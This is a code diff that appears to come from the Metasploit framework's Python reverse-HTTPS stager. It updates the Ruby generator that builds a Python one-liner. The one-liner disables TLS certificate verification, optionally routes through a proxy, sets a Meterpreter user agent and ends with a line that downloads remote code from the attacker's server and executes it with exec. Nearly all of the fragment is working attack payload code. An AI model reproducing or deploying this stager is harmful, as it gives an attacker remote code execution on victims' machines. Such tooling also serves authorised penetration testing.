|
8 | 8 |
|
9 | 9 | module Metasploit3
|
10 | 10 |
|
11 |
| - CachedSize = 446 |
| 11 | + CachedSize = 742 |
12 | 12 |
|
13 | 13 | include Msf::Payload::Stager
|
14 | 14 |
|
@@ -55,18 +55,32 @@ def generate
|
55 | 55 | proxy_host = datastore['PayloadProxyHost'].to_s
|
56 | 56 | proxy_port = datastore['PayloadProxyPort'].to_i
|
57 | 57 |
|
58 |
| - cmd = "import sys\n" |
59 | 58 | if proxy_host == ''
|
60 |
| - cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n" |
| 59 | + urllib_fromlist = "['HTTPSHandler','build_opener']" |
61 | 60 | else
|
| 61 | + urllib_fromlist = "['HTTPSHandler','ProxyHandler','build_opener']" |
| 62 | + end |
| 63 | + |
| 64 | + cmd = "import sys\n" |
| 65 | + cmd << "vi=sys.version_info\n" |
| 66 | + cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n" |
| 67 | + cmd << "hs=[]\n" |
| 68 | + # Context added to HTTPSHandler in 2.7.9 and 3.4.3 |
| 69 | + cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n" |
| 70 | + cmd << "\timport ssl\n" |
| 71 | + cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n" |
| 72 | + cmd << "\tsc.check_hostname=False\n" |
| 73 | + cmd << "\tsc.verify_mode=ssl.CERT_NONE\n" |
| 74 | + cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n" |
| 75 | + |
| 76 | + if proxy_host != '' |
62 | 77 | proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
|
63 | 78 | "http://[#{proxy_host}]:#{proxy_port}" :
|
64 | 79 | "http://#{proxy_host}:#{proxy_port}"
|
65 |
| - |
66 |
| - cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n" |
67 |
| - cmd << "o=ul.build_opener(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n" |
| 80 | + cmd << "hs.append(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n" |
68 | 81 | end
|
69 | 82 |
|
| 83 | + cmd << "o=ul.build_opener(*hs)\n" |
70 | 84 | cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
|
71 | 85 | cmd << "exec(o.open('#{target_url}').read())\n"
|
72 | 86 |
|
|